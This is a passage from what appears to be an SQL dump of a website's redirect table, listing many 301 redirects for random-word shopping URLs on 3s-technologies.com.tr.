00:00:00',301),(70894,'https://3s-technologies.com.tr/tr/shopping/bucholizite/1375834947.html',NULL,'https://3s-technologies.com.tr/shopping/bucholizite/1375834947.html','',1,0,'2026-06-11 02:51:22','0000-00-00 00:00:00',301),(70895,'https://3s-technologies.com.tr/tr/shopping/purbeck/3285586991.html',NULL,'https://3s-technologies.com.tr/shopping/purbeck/3285586991.html','',1,0,'2026-06-11 02:51:25','0000-00-00 00:00:00',301),(70896,'https://3s-technologies.com.tr/tr/shopping/insulary/3530130414.html',NULL,'https://3s-technologies.com.tr/shopping/insulary/3530130414.html','',1,0,'2026-06-11 02:51:29','0000-00-00 00:00:00',301),(70897,'https://3s-technologies.com.tr/tr/shopping/ghostlike/3902346060.html',NULL,'https://3s-technologies.com.tr/shopping/ghostlike/3902346060.html','',1,0,'2026-06-11 02:51:31','0000-00-00 00:00:00',301),(70898,'https://3s-technologies.com.tr/tr/shopping/hairy/1638150228.html',NULL,'https://3s-technologies.com.tr/shopping/hairy/1638150228.html','',1,0,'2026-06-11 02:51:34','0000-00-00 00:00:00',301),(70899,'https://3s-technologies.com.tr/tr/shopping/homodemic/88607420.html',NULL,'https://3s-technologies.com.tr/shopping/homodemic/88607420.html','',1,0,'2026-06-11 02:51:37','0000-00-00 00:00:00',301),(70900,'https://3s-technologies.com.tr/tr/shopping/hindberry/1599105381.html',NULL,'https://3s-technologies.com.tr/shopping/hindberry/1599105381.html','',1,0,'2026-06-11 02:51:40','0000-00-00 00:00:00',301),(70901,'https://3s-technologies.com.tr/tr/shopping/racoonda/835853654.html',NULL,'https://3s-technologies.com.tr/shopping/racoonda/835853654.html','',1,0,'2026-06-11 02:51:43','0000-00-00 00:00:00',301),(70902,'https://3s-technologies.com.tr/tr/shopping/veteran/2666233494.html',NULL,'https://3s-technologies.com.tr/shopping/veteran/2666233494.html','',1,0,'2026-06-11 02:51:46','0000-00-00 00:00:00',301),(70903,'https://3s-technologies.com.tr/tr/shopping/rhodosperm/2976699736.html',NULL,'https://3s-technologies.com.tr/shopping/rhodosperm/2976699736.html','',1,0,'2026-06-11 02:51:49','0000-00-00 00:00:00',301),(70904,'https://3s-technologies.com.tr/tr/shopping/tougher/1828656449.html',NULL,'https://3s-technologies.com.tr/shopping/tougher/1828656449.html','',1,0,'2026-06-11 02:51:52','0000-00-00 00:00:00',301),(70905,'https://3s-technologies.com.tr/tr/shopping/greatnephew/779132266.html',NULL,'https://3s-technologies.com.tr/shopping/greatnephew/779132266.html','',1,0,'2026-06-11 02:51:55','0000-00-00 00:00:00',301),(70906,'https://3s-technologies.com.tr/tr/shopping/weariable/1139516625.html',NULL,'https://3s-technologies.com.tr/shopping/weariable/1139516625.html','',1,0,'2026-06-11 02:51:58','0000-00-00 00:00:00',301),(70907,'https://3s-technologies.com.tr/tr/shopping/chaenopsis/1361952683.html',NULL,'https://3s-technologies.com.tr/shopping/chaenopsis/1361952683.html','',1,0,'2026-06-11 02:52:02','0000-00-00 00:00:00',301),(70908,'https://3s-technologies.com.tr/tr/shopping/birthnight/262980070.html',NULL,'https://3s-technologies.com.tr/shopping/birthnight/262980070.html','',1,0,'2026-06-11 02:52:04','0000-00-00 00:00:00',301),(70909,'https://3s-technologies.com.tr/tr/shopping/loxodromism/3149457954.html',NULL,'https://3s-technologies.com.tr/shopping/loxodromism/3149457954.html','',1,0,'2026-06-11 02:52:07','0000-00-00 00:00:00',301),(70910,'https://3s-technologies.com.tr/tr/shopping/cercolades/2975487637.html',NULL,'https://3s-technologies.com.tr/shopping/cercolades/2975487637.html','',1,0,'2026-06-11 02:52:10','0000-00-00 00:00:00',301),(70911,'https://3s-technologies.com.tr/tr/shopping/potteries/1969234606.html',NULL,'https://3s-technologies.com.tr/shopping/potteries/1969234606.html','',1,0,'2026-06-11 02:52:13','0000-00-00 00:00:00',301),(70912,'https://3s-technologies.com.tr/tr/shopping/enfroward/3371371227.html',NULL,'https://3s-technologies.com.tr/shopping/enfroward/3371371227.html','',1,0,'2026-06-11 02:52:16','0000-00-00 00:00:00',301),(70913,'https://3s-technologies.com.tr/tr/shopping/spilliken/1259970188.html',NULL,'https://3s-technologies.com.tr/shopping/spilliken/1259970188.html','',1,0,'2026-06-11 02:52:19','0000-00-00 00:00:00',301),(70914,'https://3s-technologies.com.tr/tr/shopping/clamour/3180481088.html',NULL,'https://3s-technologies.com.tr/shopping/clamour/3180481088.html','',1,0,'2026-06-11 02:52:22','0000-00-00 00:00:00',301),(70915,'https://3s-technologies.com.tr/tr/shopping/saintsimonism/2373831463.html',NULL,'https://3s-technologies.com.tr/shopping/saintsimonism/2373831463.html','',1,0,'2026-06-11 02:52:26','0000-00-00 00:00:00',301),(70916,'https://3s-technologies.com.tr/tr/shopping/astronautic/2759929405.html',NULL,'https://3s-technologies.com.tr/shopping/astronautic/2759929405.html','',1,0,'2026-06-11 02:52:28','0000-00-00 00:00:00',301),(70917,'https://3s-technologies.com.tr/tr/shopping/anomalopidae/4020257310.html',NULL,'https://3s-technologies.com.tr/shopping/anomalopidae/4020257310.html','',1,0,'2026-06-11 02:52:31','0000-00-00 00:00:00',301),(70918,'https://3s-technologies.com.tr/tr/shopping/reeligibility/3707792184.html',NULL,'https://3s-technologies.com.tr/shopping/reeligibility/3707792184.html','',1,0,'2026-06-11 02:52:34','0000-00-00 00:00:00',301),(70919,'https://3s-technologies.com.tr/tr/shopping/aristolochiales/395670903.html',NULL,'https://3s-technologies.com.tr/shopping/aristolochiales/395670903.html','',1,0,'2026-06-11 02:52:37','0000-00-00 00:00:00',301),(70920,'https://3s-technologies.com.tr/tr/shopping/receptiveness/3275773919.html',NULL,'https://3s-technologies.com.tr/shopping/receptiveness/3275773919.html','',1,0,'2026-06-11 02:52:40','0000-00-00 00:00:00',301),(70921,'https://3s-technologies.com.tr/tr/shopping/unreserved/2989629525.html',NULL,'https://3s-technologies.com.tr/shopping/unreserved/2989629525.html','',1,0,'2026-06-11 02:52:43','0000-00-00 00:00:00',301),(70922,'https://3s-technologies.com.tr/tr/shopping/rambooze/1178229022.html',NULL,'https://3s-technologies.com.tr/shopping/rambooze/1178229022.html','',1,0,'2026-06-11 02:52:49','0000-00-00 00:00:00',301),(70923,'https://3s-technologies.com.tr/tr/shopping/lochaber/63788380.html',NULL,'https://3s-technologies.com.tr/shopping/lochaber/63788380.html','',1,0,'2026-06-11 02:52:52','0000-00-00 00:00:00',301),(70924,'https://3s-technologies.com.tr/tr/shopping/elegiast/4202877075.html',NULL,'https://3s-technologies.com.tr/shopping/elegiast/4202877075.html','',1,0,'2026-06-11 02:52:55','0000-00-00 00:00:00',301),(70925,'https://3s-technologies.com.tr/tr/shopping/bacitracin/2038319399.html',NULL,'https://3s-technologies.com.tr/shopping/bacitracin/2038319399.html','',1,0,'2026-06-11 02:52:58','0000-00-00 00:00:00',301),(70926,'https://3s-technologies.com.tr/tr/shopping/topdress/2396813182.html',NULL,'https://3s-technologies.com.tr/shopping/topdress/2396813182.html','',1,0,'2026-06-11 02:53:01','0000-00-00 00:00:00',301),(70927,'https://3s-technologies.com.tr/tr/shopping/penicilliform/1589439590.html',NULL,'https://3s-technologies.com.tr/shopping/penicilliform/1589439590.html','',1,0,'2026-06-11 02:53:04','0000-00-00 00:00:00',301),(70928,'https://3s-technologies.com.tr/tr/shopping/reconvertible/3257719520.html',NULL,'https://3s-technologies.com.tr/shopping/reconvertible/3257719520.html','',1,0,'2026-06-11 02:53:07','0000-00-00 00:00:00',301),(70929,'https://3s-technologies.com.tr/tr/shopping/sulcation/1519414763.html',NULL,'https://3s-technologies.com.tr/shopping/sulcation/1519414763.html','',1,0,'2026-06-11 02:53:10','0000-00-00 00:00:00',301),(70930,'https://3s-technologies.com.tr/tr/shopping/tetrahedrite/1883551747.html',NULL,'https://3s-technologies.com.tr/shopping/tetrahedrite/1883551747.html','',1,0,'2026-06-11 02:53:13','0000-00-00 00:00:00',301),(70931,'https://3s-technologies.com.tr/tr/shopping/transmarine/3451752475.html',NULL,'https://3s-technologies.com.tr/shopping/transmarine/3451752475.html','',1,0,'2026-06-11 02:53:16','0000-00-00 00:00:00',301),(70932,'https://3s-technologies.com.tr/tr/shopping/reembrace/2665021395.html',NULL,'https://3s-technologies.com.tr/shopping/reembrace/2665021395.html','',1,0,'2026-06-11 02:53:19','0000-00-00 00:00:00',301),(70933,'https://3s-technologies.com.tr/tr/shopping/accrescence/1864261529.html',NULL,'https://3s-technologies.com.tr/shopping/accrescence/1864261529.html','',1,0,'2026-06-11 02:53:22','0000-00-00 00:00:00',301),(70934,'https://3s-technologies.com.tr/tr/shopping/catheterism/374720349.html',NULL,'https://3s-technologies.com.tr/shopping/catheterism/374720349.html','',1,0,'2026-06-11 02:53:25','0000-00-00 00:00:00',301),(70935,'https://3s-technologies.com.tr/tr/shopping/fleshings/1219527773.html',NULL,'https://3s-technologies.com.tr/shopping/fleshings/1219527773.html','',1,0,'2026-06-11 02:53:28','0000-00-00 00:00:00',301),(70936,'https://3s-technologies.com.tr/tr/shopping/rockwood/2234868612.html',NULL,'https://3s-technologies.com.tr/shopping/rockwood/2234868612.html','',1,0,'2026-06-11 02:53:31','0000-00-00 00:00:00',301),(70937,'https://3s-technologies.com.tr/tr/shopping/molestie/1990051703.html',NULL,'https://3s-technologies.com.tr/shopping/molestie/1990051703.html','',1,0,'2026-06-11 02:53:37','0000-00-00 00:00:00',301),(70938,'https://3s-technologies.com.tr/tr/shopping/inexorableness/1118179932.html',NULL,'https://3s-technologies.com.tr/shopping/inexorableness/1118179932.html','',1,0,'2026-06-11 02:53:40','0000-00-00 00:00:00',301),(70939,'https://3s-technologies.com.tr/tr/shopping/antipole/1780711156.html',NULL,'https://3s-technologies.com.tr/shopping/antipole/1780711156.html','',1,0,'2026-06-11 02:53:43','0000-00-00 00:00:00',301),(70940,'https://3s-technologies.com.tr/tr/shopping/crockery/1171117188.html',NULL,'https://3s-technologies.com.tr/shopping/crockery/1171117188.html','',1,0,'2026-06-11 02:53:46','0000-00-00 00:00:00',301),(70941,'https://3s-technologies.com.tr/tr/shopping/eleocharis/2141183074.html',NULL,'https://3s-technologies.com.tr/shopping/eleocharis/2141183074.html','',1,0,'2026-06-11 02:53:49','0000-00-00 00:00:00',301),(70942,'https://3s-technologies.com.tr/tr/shopping/hylicist/2666974478.html',NULL,'https://3s-technologies.com.tr/shopping/hylicist/2666974478.html','',1,0,'2026-06-11 02:53:53','0000-00-00 00:00:00',301),(70943,'https://3s-technologies.com.tr/tr/shopping/candlewood/2890694474.html',NULL,'https://3s-technologies.com.tr/shopping/candlewood/2890694474.html','',1,0,'2026-06-11 02:53:55','0000-00-00 00:00:00',301),(70944,'https://3s-technologies.com.tr/tr/shopping/demoralization/1657833395.html',NULL,'https://3s-technologies.com.tr/shopping/demoralization/1657833395.html','',1,0,'2026-06-11 02:53:59','0000-00-00 00:00:00',301),(70945,'https://3s-technologies.com.tr/tr/shopping/makalu/3308009152.html',NULL,'https://3s-technologies.com.tr/shopping/makalu/3308009152.html','',1,0,'2026-06-11 02:54:02','0000-00-00 00:00:00',301),(70946,'https://3s-technologies.com.tr/tr/shopping/smotheriness/291447864.html',NULL,'https://3s-technologies.com.tr/shopping/smotheriness/291447864.html','',1,0,'2026-06-11 02:54:04','0000-00-00 00:00:00',301),(70947,'https://3s-technologies.com.tr/tr/shopping/tussocky/1953784154.html',NULL,'https://3s-technologies.com.tr/shopping/tussocky/1953784154.html','',1,0,'2026-06-11 02:54:07','0000-00-00 00:00:00',301),(70948,'https://3s-technologies.com.tr/tr/shopping/intrication/3637739542.html',NULL,'https://3s-technologies.com.tr/shopping/intrication/3637739542.html','',1,0,'2026-06-11 02:54:11','0000-00-00 00:00:00',301),(70949,'https://3s-technologies.com.tr/tr/shopping/maharik/3090399937.html',NULL,'https://3s-technologies.com.tr/shopping/maharik/3090399937.html','',1,0,'2026-06-11 02:54:13','0000-00-00 00:00:00',301),(70950,'https://3s-technologies.com.tr/tr/shopping/ambrosiac/416653738.html',NULL,'https://3s-technologies.com.tr/shopping/ambrosiac/416653738.html','',1,0,'2026-06-11 02:54:16','0000-00-00 00:00:00',301),(70951,'https://3s-technologies.com.tr/tr/shopping/cepedianum/3021701235.html',NULL,'https://3s-technologies.com.tr/shopping/cepedianum/3021701235.html','',1,0,'2026-06-11 02:54:19','0000-00-00 00:00:00',301),(70952,'https://3s-technologies.com.tr/tr/shopping/satanicalness/741325572.html',NULL,'https://3s-technologies.com.tr/shopping/satanicalness/741325572.html','',1,0,'2026-06-11 02:54:25','0000-00-00 00:00:00',301),(70953,'https://3s-technologies.com.tr/tr/shopping/sphagnales/1144710363.html',NULL,'https://3s-technologies.com.tr/shopping/sphagnales/1144710363.html','',1,0,'2026-06-11 02:54:29','0000-00-00 00:00:00',301),(70954,'https://3s-technologies.com.tr/tr/shopping/erisoma/2144723270.html',NULL,'https://3s-technologies.com.tr/shopping/erisoma/2144723270.html','',1,0,'2026-06-11 02:54:33','0000-00-00 00:00:00',301),(70955,'https://3s-technologies.com.tr/tr/shopping/salicaria/236891066.html',NULL,'https://3s-technologies.com.tr/shopping/salicaria/236891066.html','',1,0,'2026-06-11 02:54:36','0000-00-00 00:00:00',301),(70956,'https://3s-technologies.com.tr/tr/shopping/hierarchies/2778369911.html',NULL,'https://3s-technologies.com.tr/shopping/hierarchies/2778369911.html','',1,0,'2026-06-11 02:54:38','0000-00-00 00:00:00',301),(70957,'https://3s-technologies.com.tr/tr/shopping/bawdyhouse/2642039708.html',NULL,'https://3s-technologies.com.tr/shopping/bawdyhouse/2642039708.html','',1,0,'2026-06-11 02:54:41','0000-00-00 00:00:00',301),(70958,'https://3s-technologies.com.tr/tr/shopping/cartilaginification/1988839604.html',NULL,'https://3s-technologies.com.tr/shopping/cartilaginification/1988839604.html','',1,0,'2026-06-11 02:54:44','0000-00-00 00:00:00',301),(70959,'https://3s-technologies.com.tr/tr/shopping/whiteeyed/2622789452.html',NULL,'https://3s-technologies.com.tr/shopping/whiteeyed/2622789452.html','',1,0,'2026-06-11 02:54:47','0000-00-00 00:00:00',301),(70960,'https://3s-technologies.com.tr/tr/shopping/ornamentation/4001344815.html',NULL,'https://3s-technologies.com.tr/shopping/ornamentation/4001344815.html','',1,0,'2026-06-11 02:54:50','0000-00-00 00:00:00',301),(70961,'https://3s-technologies.com.tr/tr/shopping/sorceress/3708908198.html',NULL,'https://3s-technologies.com.tr/shopping/sorceress/3708908198.html','',1,0,'2026-06-11 02:54:53','0000-00-00 00:00:00',301),(70962,'https://3s-technologies.com.tr/tr/shopping/pandar/1529390500.html',NULL,'https://3s-technologies.com.tr/shopping/pandar/1529390500.html','',1,0,'2026-06-11 02:54:56','0000-00-00 00:00:00',301),(70963,'https://3s-technologies.com.tr/tr/shopping/honkie/3417727698.html',NULL,'https://3s-technologies.com.tr/shopping/honkie/3417727698.html','',1,0,'2026-06-11 02:54:59','0000-00-00 00:00:00',301),(70964,'https://3s-technologies.com.tr/tr/shopping/mantology/3035150620.html',NULL,'https://3s-technologies.com.tr/shopping/mantology/3035150620.html','',1,0,'2026-06-11 02:55:02','0000-00-00 00:00:00',301),(70965,'https://3s-technologies.com.tr/tr/shopping/englishism/4179895388.html',NULL,'https://3s-technologies.com.tr/shopping/englishism/4179895388.html','',1,0,'2026-06-11 02:55:05','0000-00-00 00:00:00',301),(70966,'https://3s-technologies.com.tr/tr/shopping/poocaetes/237132742.html',NULL,'https://3s-technologies.com.tr/shopping/poocaetes/237132742.html','',1,0,'2026-06-11 02:55:08','0000-00-00 00:00:00',301),(70967,'https://3s-technologies.com.tr/tr/shopping/testicular/1200132067.html',NULL,'https://3s-technologies.com.tr/shopping/testicular/1200132067.html','',1,0,'2026-06-11 02:55:14','0000-00-00 00:00:00',301),(70968,'https://3s-technologies.com.tr/tr/shopping/aegicrania/3509784778.html',NULL,'https://3s-technologies.com.tr/shopping/aegicrania/3509784778.html','',1,0,'2026-06-11 02:55:18','0000-00-00 00:00:00',301),(70969,'https://3s-technologies.com.tr/tr/shopping/emmetropic/2206385114.html',NULL,'https://3s-technologies.com.tr/shopping/emmetropic/2206385114.html','',1,0,'2026-06-11 02:55:21','0000-00-00 00:00:00',301),(70970,'https://3s-technologies.com.tr/tr/shopping/denunciate/1035622805.html',NULL,'https://3s-technologies.com.tr/shopping/denunciate/1035622805.html','',1,0,'2026-06-11 02:55:24','0000-00-00 00:00:00',301),(70971,'https://3s-technologies.com.tr/tr/shopping/jetties/3880553475.html',NULL,'https://3s-technologies.com.tr/shopping/jetties/3880553475.html','',1,0,'2026-06-11 02:55:27','0000-00-00 00:00:00',301),(70972,'https://3s-technologies.com.tr/tr/shopping/pleurotoma/774458124.html',NULL,'https://3s-technologies.com.tr/shopping/pleurotoma/774458124.html','',1,0,'2026-06-11 02:55:30','0000-00-00 00:00:00',301),(70973,'https://3s-technologies.com.tr/tr/shopping/amylaceous/3699095126.html',NULL,'https://3s-technologies.com.tr/shopping/amylaceous/3699095126.html','',1,0,'2026-06-11 02:55:33','0000-00-00 00:00:00',301),(70974,'https://3s-technologies.com.tr/tr/shopping/muriatiferous/3982777662.html',NULL,'https://3s-technologies.com.tr/shopping/muriatiferous/3982777662.html','',1,0,'2026-06-11 02:55:36','0000-00-00 00:00:00',301),(70975,'https://3s-technologies.com.tr/tr/shopping/bonemeal/402683905.html',NULL,'https://3s-technologies.com.tr/shopping/bonemeal/402683905.html','',1,0,'2026-06-11 02:55:39','0000-00-00 00:00:00',301),(70976,'https://3s-technologies.com.tr/tr/shopping/earthgoddess/3429674814.html',NULL,'https://3s-technologies.com.tr/shopping/earthgoddess/3429674814.html','',1,0,'2026-06-11 02:55:42','0000-00-00 00:00:00',301),(70977,'https://3s-technologies.com.tr/tr/shopping/psychotria/3904770258.html',NULL,'https://3s-technologies.com.tr/shopping/psychotria/3904770258.html','',1,0,'2026-06-11 02:55:45','0000-00-00 00:00:00',301),(70978,'https://3s-technologies.com.tr/tr/shopping/deuterocanonical/432267713.html',NULL,'https://3s-technologies.com.tr/shopping/deuterocanonical/432267713.html','',1,0,'2026-06-11 02:55:48','0000-00-00 00:00:00',301),(70979,'https://3s-technologies.com.tr/tr/shopping/sourcrout/353438960.html',NULL,'https://3s-technologies.com.tr/shopping/sourcrout/353438960.html','',1,0,'2026-06-11 02:55:51','0000-00-00 00:00:00',301),(70980,'https://3s-technologies.com.tr/tr/shopping/counterpoised/2592718793.html',NULL,'https://3s-technologies.com.tr/shopping/counterpoised/2592718793.html','',1,0,'2026-06-11 02:55:54','0000-00-00 00:00:00',301),(70981,'https://3s-technologies.com.tr/tr/shopping/greegree/1306866873.html',NULL,'https://3s-technologies.com.tr/shopping/greegree/1306866873.html','',1,0,'2026-06-11 02:55:57','0000-00-00 00:00:00',301),(70982,'https://3s-technologies.com.tr/tr/shopping/craggy/4211102176.html',NULL,'https://3s-technologies.com.tr/shopping/craggy/4211102176.html','',1,0,'2026-06-11 02:56:03','0000-00-00 00:00:00',301),(70983,'https://3s-technologies.com.tr/tr/shopping/chihuahua/2030756783.html',NULL,'https://3s-technologies.com.tr/shopping/chihuahua/2030756783.html','',1,0,'2026-06-11 02:56:07','0000-00-00 00:00:00',301),(70984,'https://3s-technologies.com.tr/tr/shopping/telluride/1593642271.html',NULL,'https://3s-technologies.com.tr/shopping/telluride/1593642271.html','',1,0,'2026-06-11 02:56:10','0000-00-00 00:00:00',301),(70985,'https://3s-technologies.com.tr/tr/shopping/pabulous/1979709635.html',NULL,'https://3s-technologies.com.tr/shopping/pabulous/1979709635.html','',1,0,'2026-06-11 02:56:13','0000-00-00 00:00:00',301),(70986,'https://3s-technologies.com.tr/tr/shopping/mesocephalic/502405725.html',NULL,'https://3s-technologies.com.tr/shopping/mesocephalic/502405725.html','',1,0,'2026-06-11 02:56:16','0000-00-00 00:00:00',301),(70987,'https://3s-technologies.com.tr/tr/shopping/homelyn/2314168512.html',NULL,'https://3s-technologies.com.tr/shopping/homelyn/2314168512.html','',1,0,'2026-06-11 02:56:19','0000-00-00 00:00:00',301),(70988,'https://3s-technologies.com.tr/tr/shopping/sponsa/1174176040.html',NULL,'https://3s-technologies.com.tr/shopping/sponsa/1174176040.html','',1,0,'2026-06-11 02:56:22','0000-00-00 00:00:00',301),(70989,'https://3s-technologies.com.tr/tr/shopping/footcloth/3027665661.html',NULL,'https://3s-technologies.com.tr/shopping/footcloth/3027665661.html','',1,0,'2026-06-11 02:56:25','0000-00-00 00:00:00',301),(70990,'https://3s-technologies.com.tr/tr/shopping/inanitiate/2844480892.html',NULL,'https://3s-technologies.com.tr/shopping/inanitiate/2844480892.html','',1,0,'2026-06-11 02:56:28','0000-00-00 00:00:00',301),(70991,'https://3s-technologies.com.tr/tr/shopping/semilor/3956005539.html',NULL,'https://3s-technologies.com.tr/shopping/semilor/3956005539.html','',1,0,'2026-06-11 02:56:31','0000-00-00 00:00:00',301),(70992,'https://3s-technologies.com.tr/tr/shopping/outofdoors/4183193908.html',NULL,'https://3s-technologies.com.tr/shopping/outofdoors/4183193908.html','',1,0,'2026-06-11 02:56:34','0000-00-00 00:00:00',301),(70993,'https://3s-technologies.com.tr/tr/shopping/candidateship/3716795538.html',NULL,'https://3s-technologies.com.tr/shopping/candidateship/3716795538.html','',1,0,'2026-06-11 02:56:37','0000-00-00 00:00:00',301),(70994,'https://3s-technologies.com.tr/tr/shopping/cephalopoda/4011089121.html',NULL,'https://3s-technologies.com.tr/shopping/cephalopoda/4011089121.html','',1,0,'2026-06-11 02:56:40','0000-00-00 00:00:00',301),(70995,'https://3s-technologies.com.tr/tr/shopping/coadventurer/3755179677.html',NULL,'https://3s-technologies.com.tr/shopping/coadventurer/3755179677.html','',1,0,'2026-06-11 02:56:43','0000-00-00 00:00:00',301),(70996,'https://3s-technologies.com.tr/tr/shopping/amorosa/1946607661.html',NULL,'https://3s-technologies.com.tr/shopping/amorosa/1946607661.html','',1,0,'2026-06-11 02:56:46','0000-00-00 00:00:00',301),(70997,'https://3s-technologies.com.tr/tr/shopping/shirky/1800201096.html',NULL,'https://3s-technologies.com.tr/shopping/shirky/1800201096.html','',1,0,'2026-06-11 02:56:50','0000-00-00 00:00:00',301),(70998,'https://3s-technologies.com.tr/tr/shopping/houses/240431294.html',NULL,'https://3s-technologies.com.tr/shopping/houses/240431294.html','',1,0,'2026-06-11 02:56:53','0000-00-00 00:00:00',301),(70999,'https://3s-technologies.com.tr/tr/shopping/carotte/2593459777.html',NULL,'https://3s-technologies.com.tr/shopping/carotte/2593459777.html','',1,0,'2026-06-11 02:56:56','0000-00-00 00:00:00',301),(71000,'https://3s-technologies.com.tr/tr/shopping/schizopoda/1921866758.html',NULL,'https://3s-technologies.com.tr/shopping/schizopoda/1921866758.html','',1,0,'2026-06-11 02:56:59','0000-00-00 00:00:00',301),(71001,'https://3s-technologies.com.tr/tr/shopping/sweetwater/1603223054.html',NULL,'https://3s-technologies.com.tr/shopping/sweetwater/1603223054.html','',1,0,'2026-06-11 02:57:02','0000-00-00 00:00:00',301),(71002,'https://3s-technologies.com.tr/tr/shopping/carnivora/2547944521.html',NULL,'https://3s-technologies.com.tr/shopping/carnivora/2547944521.html','',1,0,'2026-06-11 02:57:05','0000-00-00 00:00:00',301),(71003,'https://3s-technologies.com.tr/tr/shopping/garrulousness/1902818245.html',NULL,'https://3s-technologies.com.tr/shopping/garrulousness/1902818245.html','',1,0,'2026-06-11 02:57:08','0000-00-00 00:00:00',301),(71004,'https://3s-technologies.com.tr/tr/shopping/ricinoleate/1958372958.html',NULL,'https://3s-technologies.com.tr/shopping/ricinoleate/1958372958.html','',1,0,'2026-06-11 02:57:11','0000-00-00 00:00:00',301),(71005,'https://3s-technologies.com.tr/tr/shopping/trama/3505867830.html',NULL,'https://3s-technologies.com.tr/shopping/trama/3505867830.html','',1,0,'2026-06-11 02:57:14','0000-00-00 00:00:00',301),(71006,'https://3s-technologies.com.tr/tr/shopping/unadorned/3865181192.html',NULL,'https://3s-technologies.com.tr/shopping/unadorned/3865181192.html','',1,0,'2026-06-11 02:57:17','0000-00-00 00:00:00',301),(71007,'https://3s-technologies.com.tr/tr/shopping/sauloprocta/1943838105.html',NULL,'https://3s-technologies.com.tr/shopping/sauloprocta/1943838105.html','',1,0,'2026-06-11 02:57:20','0000-00-00 00:00:00',301),(71008,'https://3s-technologies.com.tr/tr/shopping/luteocobaltic/4062298918.html',NULL,'https://3s-technologies.com.tr/shopping/luteocobaltic/4062298918.html','',1,0,'2026-06-11 02:57:23','0000-00-00 00:00:00',301),(71009,'https://3s-technologies.com.tr/tr/shopping/trillium/2703431588.html',NULL,'https://3s-technologies.com.tr/shopping/trillium/2703431588.html','',1,0,'2026-06-11 02:57:26','0000-00-00 00:00:00',301),(71010,'https://3s-technologies.com.tr/tr/shopping/admissibleness/780662202.html',NULL,'https://3s-technologies.com.tr/shopping/admissibleness/780662202.html','',1,0,'2026-06-11 02:57:28','0000-00-00 00:00:00',301),(71011,'https://3s-technologies.com.tr/tr/shopping/promptbook/1897594803.html',NULL,'https://3s-technologies.com.tr/shopping/promptbook/1897594803.html','',1,0,'2026-06-11 02:57:32','0000-00-00 00:00:00',301),(71012,'https://3s-technologies.com.tr/tr/shopping/healthless/3818804071.html',NULL,'https://3s-technologies.com.tr/shopping/healthless/3818804071.html','',1,0,'2026-06-11 02:57:35','0000-00-00 00:00:00',301),(71013,'https://3s-technologies.com.tr/tr/shopping/bombycilla/1163151727.html',NULL,'https://3s-technologies.com.tr/shopping/bombycilla/1163151727.html','',1,0,'2026-06-11 02:57:38','0000-00-00 00:00:00',301),(71014,'https://3s-technologies.com.tr/tr/shopping/adlumia/2496371463.html',NULL,'https://3s-technologies.com.tr/shopping/adlumia/2496371463.html','',1,0,'2026-06-11 02:57:41','0000-00-00 00:00:00',301),(71015,'https://3s-technologies.com.tr/tr/shopping/sergeantship/638130994.html',NULL,'https://3s-technologies.com.tr/shopping/sergeantship/638130994.html','',1,0,'2026-06-11 02:57:44','0000-00-00 00:00:00',301),(71016,'https://3s-technologies.com.tr/tr/shopping/spectrophotometric/1253681086.html',NULL,'https://3s-technologies.com.tr/shopping/spectrophotometric/1253681086.html','',1,0,'2026-06-11 02:57:47','0000-00-00 00:00:00',301),(71017,'https://3s-technologies.com.tr/tr/shopping/indoeuropean/4016054629.html',NULL,'https://3s-technologies.com.tr/shopping/indoeuropean/4016054629.html','',1,0,'2026-06-11 02:57:50','0000-00-00 00:00:00',301),(71018,'https://3s-technologies.com.tr/tr/shopping/photoxylography/3950928536.html',NULL,'https://3s-technologies.com.tr/shopping/photoxylography/3950928536.html','',1,0,'2026-06-11 02:57:53','0000-00-00 00:00:00',301),(71019,'https://3s-technologies.com.tr/tr/shopping/crossexamination/48416097.html',NULL,'https://3s-technologies.com.tr/shopping/crossexamination/48416097.html','',1,0,'2026-06-11 02:57:56','0000-00-00 00:00:00',301),(71020,'https://3s-technologies.com.tr/tr/shopping/basnet/3333562334.html',NULL,'https://3s-technologies.com.tr/shopping/basnet/3333562334.html','',1,0,'2026-06-11 02:57:59','0000-00-00 00:00:00',301),(71021,'https://3s-technologies.com.tr/tr/shopping/pneumatophorae/389398059.html',NULL,'https://3s-technologies.com.tr/shopping/pneumatophorae/389398059.html','',1,0,'2026-06-11 02:58:02','0000-00-00 00:00:00',301),(71022,'https://3s-technologies.com.tr/tr/shopping/thiophthene/1377047046.html',NULL,'https://3s-technologies.com.tr/shopping/thiophthene/1377047046.html','',1,0,'2026-06-11 02:58:05','0000-00-00 00:00:00',301),(71023,'https://3s-technologies.com.tr/tr/shopping/incongruence/2187472635.html',NULL,'https://3s-technologies.com.tr/shopping/incongruence/2187472635.html','',1,0,'2026-06-11 02:58:08','0000-00-00 00:00:00',301),(71024,'https://3s-technologies.com.tr/tr/shopping/medicamentally/532400414.html',NULL,'https://3s-technologies.com.tr/shopping/medicamentally/532400414.html','',1,0,'2026-06-11 02:58:11','0000-00-00 00:00:00',301),(71025,'https://3s-technologies.com.tr/tr/shopping/gymnasium/2644126145.html',NULL,'https://3s-technologies.com.tr/shopping/gymnasium/2644126145.html','',1,0,'2026-06-11 02:58:14','0000-00-00 00:00:00',301),(71026,'https://3s-technologies.com.tr/tr/shopping/longipinnatus/1092695862.html',NULL,'https://3s-technologies.com.tr/shopping/longipinnatus/1092695862.html','',1,0,'2026-06-11 02:58:17','0000-00-00 00:00:00',301),(71027,'https://3s-technologies.com.tr/tr/shopping/glycoluril/382221550.html',NULL,'https://3s-technologies.com.tr/shopping/glycoluril/382221550.html','',1,0,'2026-06-11 02:58:23','0000-00-00 00:00:00',301),(71028,'https://3s-technologies.com.tr/tr/shopping/monsieur/3561539655.html',NULL,'https://3s-technologies.com.tr/shopping/monsieur/3561539655.html','',1,0,'2026-06-11 02:58:25','0000-00-00 00:00:00',301),(71029,'https://3s-technologies.com.tr/tr/shopping/cultivar/140558185.html',NULL,'https://3s-technologies.com.tr/shopping/cultivar/140558185.html','',1,0,'2026-06-11 02:58:32','0000-00-00 00:00:00',301),(71030,'https://3s-technologies.com.tr/tr/shopping/releasement/1688952614.html',NULL,'https://3s-technologies.com.tr/shopping/releasement/1688952614.html','',1,0,'2026-06-11 02:58:36','0000-00-00 00:00:00',301),(71031,'https://3s-technologies.com.tr/tr/shopping/nonadult/1960057014.html',NULL,'https://3s-technologies.com.tr/shopping/nonadult/1960057014.html','',1,0,'2026-06-11 02:58:39','0000-00-00 00:00:00',301),(71032,'https://3s-technologies.com.tr/tr/shopping/atropurpureus/729456625.html',NULL,'https://3s-technologies.com.tr/shopping/atropurpureus/729456625.html','',1,0,'2026-06-11 02:58:42','0000-00-00 